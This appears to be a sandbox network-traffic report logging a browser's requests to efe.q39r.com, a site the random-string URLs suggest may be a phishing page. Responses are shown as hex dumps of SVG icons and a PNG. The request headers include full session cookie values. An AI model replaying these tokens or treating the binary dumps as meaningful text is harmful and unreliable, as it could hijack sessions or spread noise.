                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 6c cc e5 e8 0b 0b c4 33 4f 39 3a f9 dc 21 d7 8f f5 ef ff 7a ec ea f6 d6 2f 1d 00 00 00 00 00 80 19 a4 df 02 00 ce a6 7e ef 11 6f 1b 5e ba dc 8d ae 5a e9 ca 4f f5 fb 8f 5b fa bd c2 1f f6 f9 68 9f 4f f4 7f fe d4 89 87 0d ad f1 5e e4 6c a5 3c b5 fa 1a fa d7 b2 fa 9a 52 7d df e4 35 4e 5e eb e4 35 4f 5e fb e4 18 b4 3e 0d 00 00 00 00 00 00 30 d7 b6 de fe c0 25 ab 4f 18 cf f5 a3 21 95 c7 5b 15 88 ab 5f 7b f5 69 e3 a3 9b b6 75 07 2f 6e 7d 5c 00 00 00 00 00 00 98 4e fa 2d 00 60 3d 6d ef 0e 9f b7 65 70 e8 fb 56 ba fa b6 c9 0f bf f7 f9 93 7e f6 ff 63 9f 87 43 2e cf b5 ff 21 fd b6 59 3d 06 a9 3c d4 ef 85 fe 21 e4 fa c7 fd c7 7e 63 72 ac 36 77 07 bf 77 72 ec 5a 9f 3f 00 00 00 00 00 00 98 49 97 ed 7e e8 fc 90 cb ce 98 cb be 90 ea 91 d6 c5 e0 8b 92 ea d7 fb ef ed ae 30
                                                                                  Data Ascii: l3O9:!z/~o^ZO[hO^l<R}5N^5O^>0%O![_{iu/n}\N-`=mepV~cC.!Y=<!~cr6wwrZ?I~0
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: e6 24 21 d5 23 cb 83 f2 f3 ad cf 2b 00 00 00 00 00 c0 bc d2 6f e9 b7 00 98 7f 71 50 76 84 54 76 c7 5c 9e 6a 3d 2b 45 d6 33 21 d7 af f4 d9 3b 79 c0 d5 86 f1 78 63 eb 6b 0f 00 00 00 00 00 80 c6 62 1e 5d 1f fd cf 51 6b 5f cc a5 7a c4 6f 4a 01 00 00 00 00 00 58 7b fa 2d fd 16 00 f3 6b db 1d c3 0b 63 2a ef ea e7 d2 a7 5a cf 46 91 26 49 e5 70 4c c3 5f 9b 5c 0b ad af 47 00 00 00 00 00 00 1a 58 ca c3 ab 63 2a ff db bc b8 9a d7 a4 fa b5 98 47 d7 b4 3e cf 00 00 00 00 00 00 f3 42 bf a5 df 02 60 3e c5 6e 78 45 3f 87 f6 98 f3 22 c7 13 72 7d b6 cf de c9 b5 d1 fa fa 04 00 00 00 00 00 e0 2c 09 83 d1 e5 31 97 a7 5a 97 55 73 9f 54 9f 5c 19 94 37 b6 3e df 00 00 00 00 00 00 b3 4e bf a5 df 02 60 be 6c ef 0e 9f 17 06 f5 c6 7e be df df 7c fe 89 4c 73 52 bd 2f a6 f2 f6 c9 35 d3
                                                                                  Data Ascii: $!#+oqPvTv\j=+E3!;yxckb]Qk_zoJX{-kc*ZF&IpL_\GXc*G>B`>nxE?"r},1ZUsT\7>N`l~|LsR/5
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: b7 00 66 57 b7 ff 9c 95 54 df 1d 72 fd 4a f3 79 22 22 53 9f 90 ea 97 43 1e fe e6 e4 de d1 fa f6 05 00 00 00 00 00 30 53 56 ba fd 17 84 5c be d4 ba f0 91 d3 4c 2a 4f 5f b6 fb a1 f3 5b af 23 00 00 00 00 00 80 b3 45 bf 35 e3 d1 6f 01 cc a4 d8 0d af e8 ef e3 ff d6 7c 8e 88 c8 cc 25 a4 72 70 29 0f af 6e 7d 1f 03 00 00 00 00 00 98 19 21 95 9f 6b 5d f2 c8 99 a6 fc 74 eb 75 04 00 00 00 00 00 70 b6 e8 b7 e6 21 fa 2d 80 59 b1 ed 8e e1 85 fd ec dd 1d 53 fd 7a fb f9 21 22 b3 9b 72 b4 bf 8f ec b9 ac bb ef 3b 5a df d7 00 00 00 00 00 00 a6 5e 48 e5 ef db 17 3c 72 46 49 e5 6f 5b af 23 00 00 00 00 00 80 b3 45 bf 35 07 d1 6f 01 cc 84 90 cb ce 98 ea 63 cd e7 86 88 cc 4d 42 aa 5f 08 83 7a 63 eb fb 1b 00 00 00 00 00 c0 d4 da d6 1d bc 38 a4 7a a4 75 b1 23 67 5c 8c 1d b9 b4 1b
                                                                                  Data Ascii: fWTrJy""SC0SV\L*O_[#E5o|%rp)n}!k]tup!-YSz!"r;Z^H<rFIo[#E5ocMB_zc8zu#g\
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 00 00 00 00 00 00 3b c5 af f8 de e0 f2 f2 9e e8 e7 0b 00 00 00 00 00 a0 df ec b7 1a 9c fd 16 c0 4e db 27 6b 3f 37 2d ca 95 e1 b3 5c 92 06 a5 bc bc 68 e6 fc 75 cf 8f 9e cf 00 00 00 00 00 00 3b 2c cd ab 87 c2 97 2d 9a ac 36 47 3f 5f 00 00 00 00 00 00 fd 66 bf d5 e8 ec b7 00 76 42 9a b5 5f 91 14 e5 cd 03 30 c7 25 69 c0 2a 6f 99 5e b4 0f 8d 9e d3 00 00 00 00 00 00 3b 24 cd ab c7 e2 17 2d 9a 94 ba df db e8 e7 0b 00 00 00 00 00 a0 df ec b7 1a 9c fd 16 c0 0e 4b 5a 9d f7 24 79 b9 25 7c 86 4b d2 80 96 14 d5 c3 49 ab 3a 32 7a 5e 03 00 00 00 00 00 6c 37 ff 82 54 83 f3 2f 48 01 00 00 00 00 00 0d 64 bf d5 e0 ec b7 00 b6 5f 5d ef 91 14 65 1e 3e bb 25 69 8a 94 e4 e5 d2 de ec 8c 1e df 00 00 00 00 00 00 4f 2b cd ab 87 a2 97 2b 9a b4 36 47 3f 5f 00 00 00 00 00 00 fd 66 bf
                                                                                  Data Ascii: ;N'k?7-\hu;,-6G?_fvB_0%i*o^;$-KZ$y%|KI:2z^l7T/Hd_]e>%iO++6G?_f
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: a8 be 16 bd 1c d1 ae 56 7e 35 fa 39 02 00 00 00 00 00 d8 5d ec b7 9a 90 fd 16 30 1c 66 2d 6c 3f 27 cd ab 76 fc dc 95 24 f5 a3 24 2f c7 46 b2 2b 7f 3d fa fd 02 00 00 00 00 00 34 5c d2 6a 1f 1e bd 18 d1 ae 35 9a 95 6f 8b 7e 8e 00 00 00 00 00 00 76 17 fb ad a9 9f fd 16 30 0c f6 3f f6 d2 67 27 45 b5 26 7a e6 4a 4f d5 ec 79 63 f5 cb 16 5d 55 bf 72 e9 b5 f5 6b 4f be a1 7e d3 a9 1b ea c3 cf b8 b5 3e f2 8b 77 d4 7f 75 ce 5d f5 c7 ce bb b7 fe f4 37 1e ac 5b 2b 37 4f b4 f0 bb 5b ea e3 56 fd a4 ff f9 af 8f 4d 74 d2 ea f1 fa d4 cb eb 89 7a bf fd f8 ff ff f1 ff 5d ef f7 79 fc f7 ef fd b1 7a 7f cc de 1f bb f7 e7 e8 fd b9 7a 7f ce de 9f bb f7 d7 d0 fb 6b e9 fd 35 45 7f 5d a4 a7 2a 29 ca 7f 7d 5e 76 e5 af 44 bf 67 00 00 00 00 00 80 06 1b cd 56 fd 62 52 94 f7 46 2f 46 b4
                                                                                  Data Ascii: V~59]0f-l?'v$$/F+=4\j5o~v0?g'E&zJOyc]UrkO~>wu]7[+7O[VMtz]yzzk5E]*)}^vDgVbRF/F
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: ef bf 60 6d f8 73 a8 c1 2a 29 aa f2 f9 8b c6 7e 39 fa bd 05 00 00 00 00 00 34 48 9a 77 de 1b bd 04 d1 7f 58 0a b5 3a ef 89 7e 2e 00 00 00 00 00 00 06 95 fd d6 e0 65 bf 05 34 4e 5d ef 91 14 d5 e7 a3 e7 ab 06 a7 43 4f b8 a6 fe c0 b9 77 d5 27 ad 1e 0f 3f 44 57 6c cb d6 8c d7 1f 39 ef de fa d5 27 5d 1f fe 5c 6a 70 ea be 33 ce 9d 96 d5 7b 46 bf be 00 00 00 00 00 80 a6 c8 ea 3d d3 a2 fa 5e f4 12 44 8f 2f 83 ca 55 bd 7f 91 20 fa b1 00 00 00 00 00 00 18 58 f6 5b 03 95 fd 16 d0 44 49 5e cd 8d 9e af 8a 6f bf f9 6b eb b7 9e b6 b1 9e b7 f2 a1 f0 a3 73 0d 66 c7 7c f7 e1 fa 88 33 6f ab 0f 38 66 5d f8 f3 aa 01 28 2f e7 47 bf bf 00 00 00 00 00 80 06 99 9e ad 1d 49 8b ea ae f0 25 c8 d0 57 fe 68 56 d6 4e a3 9f 07 00 00 00 00 00 80 41 67 bf 35 28 d9 6f 01 cd 93 b4 3a ef 89
                                                                                  Data Ascii: `ms*)~94HwX:~.e4N]COw'?DWl9']\jp3{F=^D/U X[DI^oksf|3o8f](/GI%WhVNAg5(o:
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 98 90 d5 7b a6 79 f5 cd e8 39 ab fe f4 f2 c5 57 d5 ff f0 cd 07 c3 0f b4 a5 dd d1 a7 bf f1 60 fd b2 45 57 85 ff dc a9 3f 75 3f 6f 9f 3f ad ae f7 88 7e 2d 02 00 00 00 00 00 4d 93 ad da 2b 29 ca 3c 2d ca f1 e8 85 c8 c0 96 97 db 92 bc 5c 3a 67 79 7b ef e8 6f 17 00 00 00 00 00 c0 d0 b3 df b2 df 02 86 5e f7 1d f0 f1 f0 59 ab 5d 6e 46 ab 53 1f 71 e6 6d f5 b2 35 e3 e1 47 d9 d2 ee ac f7 cc bf eb 0b b7 d7 33 e7 76 c2 7f 0e b5 eb 25 79 f5 e1 e8 f7 22 00 00 00 00 00 d0 50 69 56 bd 2e c9 cb 4d d1 0b 91 01 ec ae d1 ac 7a 43 f4 f7 07 00 00 00 00 00 80 9f 65 bf 65 bf 05 0c a7 24 2b 0f 4a 8a 72 eb 00 cc 5b ed 42 07 9f b0 be 6e ad dc 1c 7e 88 2d 45 36 ef c2 87 ea 57 2e bd 26 fc e7 51 bb 56 f7 9f 49 b6 a4 59 fb 15 d1 ef 47 00 00 00 00 00 a0 a1 f6 9d 7b 45 92 16 d5 c5 d1 4b
                                                                                  Data Ascii: {y9W`EW?u?o?~-M+)<-\:gy{o^Y]nFSqm5G3v%y"PiV.MzCee$+Jr[Bn~-E6W.&QVIYG{EK


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  54192.168.2.1749769172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:34 UTC1493OUTGET /opkZKWoBXgK4XlaBoarjPDswkBdr2NIUBC8D3VyslijyXn8FWJLDbkTI32Kpccd196 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC673INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/svg+xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="opkZKWoBXgK4XlaBoarjPDswkBdr2NIUBC8D3VyslijyXn8FWJLDbkTI32Kpccd196"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xu%2FYDd9t1pPyb9JLJmuZnsDxjRg4LAwDHdTsvNX1OT119wHaKqHS4%2FiMbdI7fqGX%2Bm9FApy9zo1REPp8vBO%2FO4RUg2aB2rWnfTYIjWBp6NZzJhANoCkI1gG%2FYFKA8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadac9eb144dd-ATL
                                                                                  2024-04-25 16:23:35 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                                                  Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                                                  2024-04-25 16:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  55192.168.2.1749772172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:35 UTC1113OUTGET /mn2YUCVnR8vQa9aF2S75S9IkijyLIGjmjHd6iKoP0ehtuyRPp90150 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC655INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/svg+xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="mn2YUCVnR8vQa9aF2S75S9IkijyLIGjmjHd6iKoP0ehtuyRPp90150"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uT3nMyjkloLPZgfG6%2Bfy8gjCkY0C%2F3NTZHwq4ZEg2kryTMfUa8ud7cT8L81RMWUKpnMtPl3ixluHpSWRlTE46sFPq44EjsijrnpfHt668Ws85bKIqIV9l8pCaCyJOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadaff98c78ce-ATL
                                                                                  2024-04-25 16:23:35 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                                                  Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                                                  2024-04-25 16:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  56192.168.2.1749771172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:35 UTC1483OUTGET /ghZkYyc0mYIKciokhMyZ3rmnOyD3C9NSbJEMXI7KFs37Tbx9uncef210 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC648INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 49602
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="ghZkYyc0mYIKciokhMyZ3rmnOyD3C9NSbJEMXI7KFs37Tbx9uncef210"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ixa47vVRM60VerQKVk%2FMWcTwcZGLIvjVSCqMVbOQqLW7yb%2BfgxMHVuG1wbDWCcwu2thpwuLXgqkKpFCYh6jwHodnjk2ML3zXnIvZEEMzSrEFCjkbM62kHgwwGzBzJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadafbf0153e0-ATL
                                                                                  2024-04-25 16:23:35 UTC721INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                                                  Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88 b4 aa c3 24 e2 27 53 ad d6 6a 02 70 01 b0 33
                                                                                  Data Ascii: G8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$$'Sjp3
